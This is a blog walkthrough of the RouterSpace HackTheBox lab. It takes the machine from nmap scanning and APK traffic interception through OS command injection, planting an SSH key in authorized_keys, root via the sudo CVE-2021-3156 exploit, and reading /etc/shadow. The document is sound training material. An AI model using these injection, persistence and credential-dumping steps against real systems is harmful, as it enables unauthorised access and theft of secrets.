RouterSpace HackTheBox WalkThrough

RouterSpace HackTheBox Machine banner

This is RouterSpace HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted RouterSpace HackTheBox machine. Before starting, let us know something about this machine. It is Linux OS box with IP address and difficulty Easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and confirm your connectivity with RouterSpace Box by pinging its IP If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. As usual I have used $ nmap [a popular port scanner] for this task and the result is given below: –


$ nmap -p- --min-rate=10000 -oN fulltcp-scan.nmap
Performing nmap 1 scan during RouterSpace HackTheBox Machine walkthrough
$ sudo nmap -p22,80 -sV -sC -oN ScriptScan.nmap
Performing nmap 2 scan during RouterSpace HackTheBox Machine walkthrough


Nmap found port no 22 and 80 as open. OpenSSH_8.2p1 is running on port 22 and Node.js Server is running on port 80 [ which I got to know after getting inside the RouterSpace box]. Before entering into the enumeration of this machine let us add routerspace.htb host to our hosts file. The advantage of it is that if there will be virtual hosting enabled then we would get some other website to enumerate on. The hosts file is present inside directory /etc/ of our Kali/Parrot machine.

Host File After Modification

$ cat /etc/hosts
Host file after Modification during RouterSpace HTB walkthrough

Since web server is running on port 80 so we have two URLs to check viz.  and http://routerspace.htb.  Ongoing to each URL separately found the same web page which confirms that there is no any virtual hosting enabled on this server. We are free to use any URL while hunting. I will use http://routerspace.htb throughout the walkthrough.

Ongoing to http://routerspace.htb found a download button which contain an APK file named RouterSpace.apk. Downloaded it and we will reverse engineer it when will not get anything interesting on http://routerspace.htb.

RouterSpace HTB web page

Performed directory bruteforce with $ dirsearch using wordlist directory-list-2-3-medium.txt & vhost bruteforce with $ gobuster using wordlist subdomains-top1million-110000.txt but did not find any special directory and virtual host. Checked the page-source of the webpage at http://routerspace.htb for some type of hint but did not get anything interesting. Till now I didn’t get anything interesting which helps me to proceed further.

As we have already downloaded the apkfile so let us install it in any android enumerator and play with it. I am going to use $ anbox which is an open-source android emulator for Linux OS. I have used this link for installation of anbox on my Kali OS.

Install & Configure AnBox

$ sudo apt install anbox
Installing Anbox emulator during RouterSpace Walkthrough
$ sudo modprobe ashmem_linux
$ sudo modprobe binder_linux
$ sudo /sbin/modprobe ashmem_linux
$ sudo /sbin/modprobe binder_linux
$ wget
$ sudo mv android_amd64.img /var/lib/anbox/android.img
$ sudo service anbox-container-manager restart
Configuring Anbox emulator on my Kali Machine during RouterSpace HackTheBox Walkthrough
$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
Starting Anbox using Activity Manager using terminal

We have successfully installed the anbox emulator. Let us install $ adb tool using which we will access the emulator and install the app RouterSpace.apk into it. And also configure the proxy setting to capture the request of RouterSpace application.

Installing adb & Configuring Proxy

$ sudo apt install adb
Installing Adb on my Kali Machine during RouterSpace HTB Walkthrough


$ adb devices # To list the attached devices
$ adb -s emulator-5558 install ~/Downloads/RouterSpace.apk # To install RouterSpace apk
$ adb -s emulator-5558 shell settings put global http_proxy # To configure burp proxy
Installing RouterSpace.apk file using adb in anbox emulator

We have set the proxy to address where is gateway address of anbox0 interface and 8081 is the port where Burpsuite will be listening. Also configure the Burpsuite proxy to listen on port 8081 as shown in the screenshot given below.

Configuring burp proxy 1

If you are having issue in finding the gateway address of your anbox in Burpsuite, you can configure the Burpsuite proxy to listen on all interfaces as shown in the screenshot given below. It will also work.

Configuring burp proxy 2

Once everything is configured launch the anbox manager by the below command or simply by searching anbox in start menu.

$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
Starting anbox using Anbox Activity manager during RouterSpace HackTheBox walkthrough
Starting anbox using Start menu

Turn on the intercept in Burpsuite and open the RouterSpace application. Click on Check Status button.

Capturing the request of routerspace application through burp proxy

Note: If you are getting connection error and anbox is taking too long time to start then you can restart the anbox manger service by the command $ sudo service anbox-container-manager restart. This can resolve the start problem.

After intercepting the request got an IP in JSON format. This reminded me of Command Injection vulnerability which I have previously exploited in DVWA web application . I have also written a post on DVWA Command Injection. Read the post here for more info on Command Injection vulnerability.

After trying some basic command injection payloads found that it is vulnerable to OS Command Injection vulnerability.

Confirming OS Command Injection

Simply use the concatenating string ;id after the IP address and you will get the id of user paul.

Confirming OS Command Injection vulnerability in RouterSpace HackTheBox Machine

Getting User Shell

Now, we have confirmed OS Command Injection vulnerability. My next step is to get reverse shell on my kali machine using some one-liner. Tried different one-liners but none of them worked [you can generate multiple one-liners from here]. This may be due to the reason that nc, curl, wget & bash commands were not allowed to communicate using remote address. Didn’t know exactly what the issue was.

Then I pasted my SSH-Public key in authorized_keys file of user paul and using my private key I got user shell.

Note: If authorized_keys file doesn’t exit then create one.

$ ssh-keygen -f key
$ cat
Generating SSH Key on my Kali Machine
$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwI9EZqYqEZQBfb5dQyeB56MKMR37fojC8yKzceNFgqbZO4Ry8p1tIlzy/C6X81w4uGM+egoBKIDPYnYSeCZefOF2FoI7TxPT0+Jq1jY6NIxnVXUd8H2j4+MPTAM7NQJTrP01kC3NeKK6SfQJ8JLSLyzmbjfCnrl5n5RiX2rFef522ISNEy8ecV7rNFjf9VKnduzMwPHNxbLIxjyuURgzOuLFKXtaQ7T6XAht6wFLCDNSHD/5eWaMGMOvGK8OmInl/fbHSGHT5LjOuR4/JQGNP8BD91C4Ne4rgYj4O40QSv9OgWdwyPEkzcdfk9luFqx5PB75MnMp0PICoNOiNlziUByiQFwGm9DRz98wYXAOH5ivcqtmFDVadrjZ3qwvQ3nMxrFqiS4b2l43+0lQ6h+OR379O6XSsKQY/S4rhKuev7JdXeY7WA3CZQu8bVbxQHi6uYFWprqgDTrMZy24PgcMQDDjjvxwpz/rVslMwAz5MOS+fc/m3hXBKaUYxUrhL9TM= deepak@kali'>>/home/paul/.ssh/authorized_keys
Pasting the content in authorized_keys file of paul user on RouterSpace machine
$ chmod 600 key
$ ssh -i key [email protected]
$ whoami && id
SSH into RouterSpace using private key

We have successfully got user shell as paul. Let us capture user flag from user.txt file.

Capture User Flag

$ cat user.txt
Capturing user flag in RouterSpace HTB during its walkthrough

Privilege Escalation

To escalate the privilege to root we have to first find a Privilege Escalation Vector using which we can perform privilege escalation. We can find PrivEsc Vector either manually or using some post exploitation enumeration scripts like, and there are a lot more. This time I will go with LinPEAS viz. script enumeration technique.

Finding PrivEsc Vector

LinPEAS found that Sudo version is vulnerable. After googling Sudo 1.8.31 exploit, found that Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow [CVE-2021-3156], which allows privilege escalation to root via $ sudoedit -s and a command-line argument that ends with a single backslash character.

LinPEAS output in RouterSpace HTB

For more details about this vulnerability check this article from qualys and its working exploit can be found here. When I tried to escalate the privilege using the exploit present at latter link, I could easily get root shell. So, here our PrivEsc Vector is Privilege Escalation by exploiting Vulnerable Sudo version.

Simply make three files by the name hax.c, lib.c & Makefile. Put the content from this exploit. in the respective files. And at last, execute the $ make command as shown below.

$ nano hax.c
$ nano lib.c
$ nano Makefile
$ ls
$ make
$ ./sudo-hax-me-a-sandwic­­­­­h 1
# whoami && id
Privilege Escalation in RouterSpace HTB during its walkthrough

We have successfully got root shell. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt
Capturing root flag in RouterSpace HTB

This was how I rooted to RouterSpace HackTheBox machine. Learnt a lot during this walkthrough. Hope you would have also learnt some new things. Thanks for reading this writeup. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at

Dumping Root Hash

# cat /etc/shadow | grep root
Dumping Root Hash in RouterSpace HackTheBox machine.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at